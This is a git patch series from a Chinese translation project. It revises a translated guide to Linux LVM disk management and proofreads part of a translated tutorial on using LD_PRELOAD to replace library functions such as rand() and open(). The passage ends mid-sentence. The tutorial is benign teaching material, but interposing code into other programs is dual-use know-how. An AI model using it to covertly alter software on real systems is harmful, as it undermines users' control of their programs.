Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @qhwdw 原文增补了一段,我加上了。 https://linux.cn/article-9168-1.html --- ...sers guide to Logical Volume Management.md | 132 ++++++++++++------ 1 file changed, 92 insertions(+), 40 deletions(-) rename {translated/tech => published}/20160922 A Linux users guide to Logical Volume Management.md (50%) diff --git a/translated/tech/20160922 A Linux users guide to Logical Volume Management.md b/published/20160922 A Linux users guide to Logical Volume Management.md similarity index 50% rename from translated/tech/20160922 A Linux users guide to Logical Volume Management.md rename to published/20160922 A Linux users guide to Logical Volume Management.md index c43a8777e1..25d4465c48 100644 --- a/translated/tech/20160922 A Linux users guide to Logical Volume Management.md +++ b/published/20160922 A Linux users guide to Logical Volume Management.md @@ -1,86 +1,80 @@ -Linux 用户的逻辑卷管理指南 +逻辑卷管理(LVM) Linux 用户指南 ============================================================ ![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") + Image by : opensource.com -管理磁盘空间对系统管理员来说是一件重要的日常工作。因为磁盘空间耗尽而去启动一系列的耗时而又复杂的任务,来提升磁盘分区中可用的磁盘空间。它会要求系统离线。通常会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 /etc/fstab 文件内容去反映出新分区的正确设备名、以及重新引导去重新挂载新的文件系统到正确的挂载点。 +管理磁盘空间对系统管理员来说是一件重要的日常工作。一旦磁盘空间耗尽就需要进行一系列耗时而又复杂的任务,以提升磁盘分区中可用的磁盘空间。它也需要系统离线才能处理。通常这种任务会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 `/etc/fstab` 文件的内容来反映出新分区的正确设备名、以及重新引导来重新挂载新的文件系统到正确的挂载点。 我想告诉你的是,当 LVM (逻辑卷管理)首次出现在 Fedora Linux 中时,我是非常抗拒它的。我最初的反应是,我并不需要在我和我的设备之间有这种额外的抽象层。结果是我错了,逻辑卷管理是非常有用的。 -LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷的单个卷组中。 +LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它也允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷(LV)的单个卷组(VG)中。 -卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须被减少。 +卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须先被减少。 -有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3、和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。 +有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3 和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。 -### 在使用中扩展一个文件系统 +### 即时扩展一个文件系统 -在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在第三个安装时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。 +在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装了一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在安装到三分之一时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。 请注意,这个问题并不是虚拟机磁盘太小造成的,而是由于宿主机上空间不足,导致虚拟机上的虚拟磁盘在宿主机上的逻辑卷中没有足够的空间去扩展。 -因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后在使用中扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 — 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。 +因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后即时扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 —— 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。 虽然这种问题你可能从来也没有遇到过,但是,许多人都遇到过重要程序在运行过程中发生磁盘空间不足的问题。而且,虽然许多程序,尤其是 Windows 程序,并不像 VirtualBox 一样写的很好,且富有弹性,Linux 逻辑卷管理可以使它在不丢失数据的情况下去恢复,也不需要去进行耗时的安装过程。 ### LVM 结构 -逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如EXT3 或者 EXT4,可以创建在一个逻辑卷上。 +逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如 EXT3 或者 EXT4,可以创建在一个逻辑卷上。 -在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷,和一个文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。 +在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷和文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。 ![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png) - _图 1: LVM 允许组合分区和整个硬盘到卷组中_ +_图 1: LVM 允许组合分区和整个硬盘到卷组中_ 在一个主机上增加磁盘空间是非常简单的,在我的经历中,这种事情是很少的。下面列出了基本的步骤。你也可以创建一个完整的新卷组或者增加新的空间到一个已存在的逻辑卷中,或者创建一个新的逻辑卷。 ### 增加一个新的逻辑卷 -有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 /home 文件系统被填满时,我决定去创建一个新的逻辑卷,用于去存储虚拟机数据,包含虚拟磁盘。这将在我的 /home 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。 +有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 `/home` 文件系统被填满时,我决定去创建一个新的逻辑卷,以存储包含虚拟磁盘在内的虚拟机数据。这将在我的 `/home` 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。 增加一个新的逻辑卷的基本步骤如下: 1. 如有需要,安装一个新硬盘。 - -2. 可选 1: 在硬盘上创建一个分区 - +2. 可选: 在硬盘上创建一个分区。 3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。 - 4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。 - 5. 从卷空间中创建一个新的逻辑卷(LV)。 - 6. 在新的逻辑卷中创建一个文件系统。 - -7. 在 /etc/fstab 中增加适当的条目以挂载文件系统。 - +7. 在 `/etc/fstab` 中增加适当的条目以挂载文件系统。 8. 挂载文件系统。 为了更详细的介绍,接下来将使用一个示例作为一个实验去教授关于 Linux 文件系统的知识。 -### 示例 +#### 示例 -这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行和挂载的文件系统上执行。 +这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行着和已挂载的文件系统上执行。 警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。 -### 安装硬盘 +##### 安装硬盘 -如果在系统中现有硬盘上的卷组中没有足够的空间去增加,那么可能需要去增加一块新的硬盘,然后去创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。 +如果在系统中现有硬盘上的卷组中没有足够的空间可以增加,那么可能需要去增加一块新的硬盘,然后创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。 -### 从硬盘上创建物理卷 +##### 从硬盘上创建物理卷 -首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 /dev/hdd。 +首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 `/dev/hdd`。 ``` pvcreate /dev/hdd ``` -在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,以及另外的物理卷部分的元数据所使用的磁盘空间。 +在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的 Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,而且元数据所用的磁盘空间也能用做 PV 的一部分使用。 -### 扩展已存在的卷组 +##### 扩展已存在的卷组 在这个示例中,我将扩展一个已存在的卷组,而不是创建一个新的;你可以选择其它的方式。在物理磁盘已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。 @@ -88,7 +82,7 @@ pvcreate /dev/hdd vgextend /dev/MyVG01 /dev/hdd ``` -### 创建一个逻辑卷 +##### 创建一个逻辑卷 首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。 @@ -96,7 +90,7 @@ vgextend /dev/MyVG01 /dev/hdd lvcreate -L +50G --name Stuff MyVG01 ``` -### 创建文件系统 +##### 创建文件系统 创建逻辑卷并不会创建文件系统。这个任务必须被单独执行。下面的命令在新创建的逻辑卷中创建了一个 EXT4 文件系统。 @@ -104,7 +98,7 @@ lvcreate -L +50G --name Stuff MyVG01 mkfs -t ext4 /dev/MyVG01/Stuff ``` -### 增加一个文件系统卷标 +##### 增加一个文件系统卷标 增加一个文件系统卷标,更易于在文件系统以后出现问题时识别它。 @@ -112,20 +106,78 @@ mkfs -t ext4 /dev/MyVG01/Stuff e2label /dev/MyVG01/Stuff Stuff ``` -### 挂载文件系统 +##### 挂载文件系统 -在这个时候,你可以创建一个挂载点,并在 /etc/fstab 文件系统中添加合适的条目,以挂载文件系统。 +在这个时候,你可以创建一个挂载点,并在 `/etc/fstab` 文件系统中添加合适的条目,以挂载文件系统。 -你也可以去检查并校验创建的卷是否正确。你可以使用 **df**、**lvs**、和 **vgs** 命令去做这些工作。 +你也可以去检查并校验创建的卷是否正确。你可以使用 `df`、`lvs` 和 `vgs` 命令去做这些工作。 + +### 在 LVM 文件系统中调整逻辑卷大小 + +从 Unix 的第一个版本开始,对文件系统的扩展需求就一直伴随,Linux 也不例外。随着有了逻辑卷管理(LVM),现在更加容易了。 + +1. 如有需要,安装一个新硬盘。 +2. 可选: 在硬盘上创建一个分区。 +3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。 +4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。 +5. 从卷空间中创建一个新的逻辑卷(LV),或者用卷组中部分或全部空间扩展已有的逻辑卷。 +6. 如果创建了新的逻辑卷,那么在上面创建一个文件系统。如果对已有的逻辑卷增加空间,使用 `resize2fs` 命令来增大文件系统来填满逻辑卷。 +7. 在 `/etc/fstab` 中增加适当的条目以挂载文件系统。 +8. 挂载文件系统。 + + +#### 示例 + +这个示例展示了怎么用命令行去扩展一个已存在的卷组。它会给 `/Staff` 文件系统增加大约 50GB 的空间。这将生成一个可用于挂载的文件系统,在 Linux 2.6 内核(及更高)上可即时使用 EXT3 和 EXT4 文件系统。我不推荐你用于任何关键系统,但是这是可行的,我已经成功了好多次;即使是在根(`/`)文件系统上。是否使用自己把握风险。 + +警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。 + +##### 安装硬盘 + +如果在系统中现有硬盘上的卷组中没有足够的空间可以增加,那么可能需要去增加一块新的硬盘,然后创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。 + +##### 从硬盘上创建物理卷 + +首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 `/dev/hdd`。 + +``` +pvcreate /dev/hdd +``` + +在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的 Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,而且元数据所用的磁盘空间也能用做 PV 的一部分使用。 + +##### 增加物理卷到已存在的卷组 + +在这个示例中,我将使用一个新的物理卷来扩展一个已存在的卷组。在物理卷已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。 + +``` +vgextend /dev/MyVG01 /dev/hdd +``` + +##### 扩展逻辑卷 + +首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。 + +``` +lvcreate -L +50G --name Stuff MyVG01 +``` + +##### 扩展文件系统 + +如果你使用了 `-r` 选项,扩展逻辑卷也将扩展器文件系统。如果你不使用 `-r` 选项,该操作不行单独执行。下面的命令在新调整大小的逻辑卷中调整了文件系统大小。 + +``` +resize2fs /dev/MyVG01/Stuff +``` + +你也可以去检查并校验调整大小的卷是否正确。你可以使用 `df`、`lvs` 和 `vgs` 命令去做这些工作。 ### 提示 过去几年来,我学习了怎么去做让逻辑卷管理更加容易的一些知识,希望这些提示对你有价值。 * 除非你有一个明确的原因去使用其它的文件系统外,推荐使用可扩展的文件系统。除了 EXT2、3、和 4 外,并不是所有的文件系统都支持调整大小。EXT 文件系统不但速度快,而且它很高效。在任何情况下,如果默认的参数不能满足你的需要,它们(指的是文件系统参数)可以通过一位知识丰富的系统管理员来调优它。 - * 使用有意义的卷和卷组名字。 - * 使用 EXT 文件系统标签 我知道,像我一样,大多数的系统管理员都抗拒逻辑卷管理。我希望这篇文章能够鼓励你至少去尝试一个 LVM。如果你能那样做,我很高兴;因为,自从我使用它之后,我的硬盘管理任务变得如此的简单。 @@ -133,9 +185,9 @@ e2label /dev/MyVG01/Stuff Stuff ### 关于作者 - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] +[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] - David Both - 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。... [more about David Both][7][More about me][8] +David Both 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。 -------------------------------------------------------------------------------- @@ -143,7 +195,7 @@ via: https://opensource.com/business/16/9/linux-users-guide-lvm 作者:[David Both](a) 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 551c19fb5d3b24bb53e2f51205e07467885c7bb9 Mon Sep 17 00:00:00 2001 From: Ocputs <15391606236@163.com> Date: Sun, 24 Dec 2017 10:04:18 +0800 Subject: [PATCH 0766/1627] change error github's ID --- ...214 How to squeeze the most out of Linux file compression.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md index 66a6ab980a..f844719399 100644 --- a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md +++ b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md @@ -106,7 +106,7 @@ $ xzmore textfile.xz | head -1 -------------------------------------------------------------------------------- via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html -作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledp ][2] 校对:校对者ID +作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledo ][2] 校对:校对者ID 本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出 From 7bc0f7e32e6cae3ad71512f822068e0db238e0dd Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Sun, 24 Dec 2017 15:06:51 +0800 Subject: [PATCH 0767/1627] =?UTF-8?q?Update=2020171205=20Ubuntu=2018.04=20?= =?UTF-8?q?=E2=80=93=20New=20Features.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171205 Ubuntu 18.04 – New Features.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171205 Ubuntu 18.04 – New Features.md b/sources/tech/20171205 Ubuntu 18.04 – New Features.md index 79fa22e1f6..70682f6304 100644 --- a/sources/tech/20171205 Ubuntu 18.04 – New Features.md +++ b/sources/tech/20171205 Ubuntu 18.04 – New Features.md @@ -1,3 +1,4 @@ +translating by kimii Ubuntu 18.04 – New Features, Release Date & More ============================================================ From 4084ed718239874e6055f95b27ae4923a4fa486e Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 24 Dec 2017 21:43:27 +0800 Subject: [PATCH 0768/1627] PRF:20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @qhwdw --- ...nject features and investigate programs.md | 174 +++++++++--------- 1 file changed, 84 insertions(+), 90 deletions(-) diff --git a/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md index f82e38c3d2..6fdce6b8c8 100644 --- a/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md +++ b/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @@ -1,15 +1,17 @@ -# 动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序 +动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序 +============= **本文假设你具备基本的 C 技能** -Linux 完全在你的控制之中。从每个人的角度来看似乎并不总是这样,但是一个高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。 +Linux 完全在你的控制之中。虽然从每个人的角度来看似乎并不总是这样,但是高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。 -#### 一个让我们产生兴趣的示例 +### 一个让我们产生兴趣的示例 让我们以一个简单的示例开始。先乐趣,后科学。 -random_num.c: +*random_num.c:* + ``` #include #include @@ -25,18 +27,18 @@ int main(){ 我相信,它足够简单吧。我不使用任何参数来编译它,如下所示: -> ``` -> gcc random_num.c -o random_num -> ``` +``` +gcc random_num.c -o random_num +``` -我希望它输出的结果是明确的 – 从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。 +我希望它输出的结果是明确的:从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。 -现在,让我们假装真的不知道这个可执行程序的来源。也将它的源文件删除,或者把它移动到别的地方 – 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你不需要接触到它的源代码也不需要重新编译它。 +现在,让我们假装真的不知道这个可执行程序的出处。甚至将它的源文件删除,或者把它移动到别的地方 —— 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你并不需要接触到它的源代码,也不需要重新编译它。 因此,让我们来创建另外一个简单的 C 文件: +*unrandom.c:* -unrandom.c: ``` int rand(){ return 42; //the most random number in the universe @@ -45,70 +47,71 @@ int rand(){ 我们将编译它进入一个共享库中。 -> ``` -> gcc -shared -fPIC unrandom.c -o unrandom.so -> ``` +``` +gcc -shared -fPIC unrandom.c -o unrandom.so +``` -因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 42 实现一个 rand() 函数。现在 … 就像运行 `random_num` 一样,然后再观察结果: +因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 `42` 实现了一个 `rand()` 函数。现在 …… 就像运行 `random_num` 一样,然后再观察结果: -> ``` -> LD_PRELOAD=$PWD/unrandom.so ./random_nums -> ``` +``` +LD_PRELOAD=$PWD/unrandom.so ./random_nums +``` -如果你想偷懒或者不想自动亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 – 它输出了十次常数 42。 +如果你想偷懒或者不想自动亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 —— 它输出了十次常数 42。 -它让你感到非常惊讶吧。 +如果先这样执行 -> ``` -> export LD_PRELOAD=$PWD/unrandom.so -> ``` +``` +export LD_PRELOAD=$PWD/unrandom.so +``` -然后再以正常方式运行这个程序。一个未被改变的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 … +然后再以正常方式运行这个程序,这个结果也许会更让你吃惊:一个未被改变过的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 …… -##### **等等,什么?刚刚发生了什么?** +**等等,什么?刚刚发生了什么?** -是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” rand(),而是使用了我们提供的 – 它每次都返回 42。 +是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” `rand()`,而是使用了我们提供的的那个 —— 它每次都返回 `42`。 -##### **但是,我们 *告诉* 它去使用真实的那个。我们设置它去使用真实的那个。另外,在创建那个程序的时候,假冒的 rand() 甚至并不存在!** +**但是,我们*告诉过*它去使用真实的那个。我们编程让它去使用真实的那个。另外,在创建那个程序的时候,假冒的 `rand()` 甚至并不存在!** -这并不完全正确。我们只能告诉它去使用 rand(),但是我们不能去选择哪个 rand() 是我们希望我们的程序去使用的。 +这句话并不完全正确。我们只能告诉它去使用 `rand()`,但是我们不能去选择哪个 `rand()` 是我们希望我们的程序去使用的。 -当我们的程序启动后,(为程序提供需要的函数的)某些库被加载。我们可以使用 _ldd_ 去学习它是怎么工作的: +当我们的程序启动后,(为程序提供所需要的函数的)某些库被加载。我们可以使用 `ldd` 去学习它是怎么工作的: -> ``` -> $ ldd random_nums -> linux-vdso.so.1 => (0x00007fff4bdfe000) -> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) -> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) -> ``` +``` +$ ldd random_nums +linux-vdso.so.1 => (0x00007fff4bdfe000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) +/lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) +``` -正如你看到的输出那样,它列出了被程序 `random_nums` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的精确的输出可能与示例有所不同,但是,一个 **libc.so** 肯定是有的 – 这个文件提供了核心的 C 函数。它包含了 “真正的” rand()。 +正如你看到的输出那样,它列出了被程序 `random_nums` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的具体的输出可能与示例有所不同,但是,一个 `libc.so` 肯定是有的 —— 这个文件提供了核心的 C 函数。它包含了 “真正的” `rand()`。 我使用下列的命令可以得到一个全部的函数列表,我们看一看 libc 提供了哪些函数: -> ``` -> nm -D /lib/libc.so.6 -> ``` +``` +nm -D /lib/libc.so.6 +``` -这个 _nm_  命令列出了在一个二进制文件中找到的符号。-D 标志告诉它去查找动态符号,因此 libc.so.6 是一个动态库。这个输出是很长的,但它确实在很多的其它标准函数中列出了 rand()。 +这个 `nm`  命令列出了在一个二进制文件中找到的符号。`-D` 标志告诉它去查找动态符号,因为 `libc.so.6` 是一个动态库。这个输出是很长的,但它确实在列出的很多标准函数中包括了 `rand()`。 -现在,在我们设置了环境变量 LD_PRELOAD 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 _unrandom.so_,尽管程序本身并没有这样去要求它。下列的命令可以看得出来: +现在,在我们设置了环境变量 `LD_PRELOAD` 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 `unrandom.so`,尽管程序本身并没有这样去要求它。下列的命令可以看得出来: -> ``` -> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums -> linux-vdso.so.1 => (0x00007fff369dc000) -> /some/path/to/unrandom.so (0x00007f262b439000) -> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) -> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) -> ``` +``` +$ LD_PRELOAD=$PWD/unrandom.so ldd random_nums +linux-vdso.so.1 => (0x00007fff369dc000) +/some/path/to/unrandom.so (0x00007f262b439000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) +/lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) +``` -注意,它列出了我们当前的库。实际上这就是代码为什么被运行的原因:`random_num` 调用了 rand(),但是,如果 `unrandom.so` 被加载,它调用的是我们提供的实现了 rand() 的库。很清楚吧,不是吗? +注意,它列出了我们当前的库。实际上这就是代码为什么得以运行的原因:`random_num` 调用了 `rand()`,但是,如果 `unrandom.so` 被加载,它调用的是我们所提供的实现了 `rand()` 的库。很清楚吧,不是吗? -#### 更清楚地了解 +### 更清楚地了解 -这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够使用函数正常工作。如果我们使用一个简单的 “return 0” 去实现 open() 你就明白了。我们看到这个应用程序就像发生了故障一样。这是 **显而易见的**, 真实地去调用原始的 open: +这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够像个正常的函数一样工作。如果我们使用一个简单的 `return 0` 去实现 `open()` 你就明白了。我们看到这个应用程序就像发生了故障一样。这是 **显而易见的**, 真实地去调用原始的 `open()`: + +*inspect_open.c:* -inspect_open.c: ``` int open(const char *pathname, int flags){ /* Some evil injected code goes here. */ @@ -116,11 +119,11 @@ int open(const char *pathname, int flags){ } ``` -嗯,不完全是。这将去调用 “原始的” open(…)。显然,这是一个无休止的回归调用。 +嗯,不对。这将不会去调用 “原始的” `open(...)`。显然,这是一个无休止的递归调用。 -怎么去访问这个 “真正的” open 函数呢?它需要去使用程序接口进行动态链接。它听起来很简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么: +怎么去访问这个 “真正的” `open()` 函数呢?它需要去使用程序接口进行动态链接。它比听起来更简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么: -inspect_open.c: +*inspect_open.c:* ``` #define _GNU_SOURCE @@ -138,63 +141,54 @@ int open(const char *pathname, int flags, ...) } ``` -_dlfcn.h_ 是被 _dlsym_ 函数所需要,我们在后面会用到它。那个奇怪的 _#define_ 是命令编译器去允许一些非标准的东西,我们需要它去启用 _dlfcn.h_ 中的 `RTLD_NEXT`。那个 typedef 只是创建了一个函数指针类型的别名,它的参数是原始的 open – 别名是 `orig_open_f_type`,我们将在后面用到它。 +`dlfcn.h` 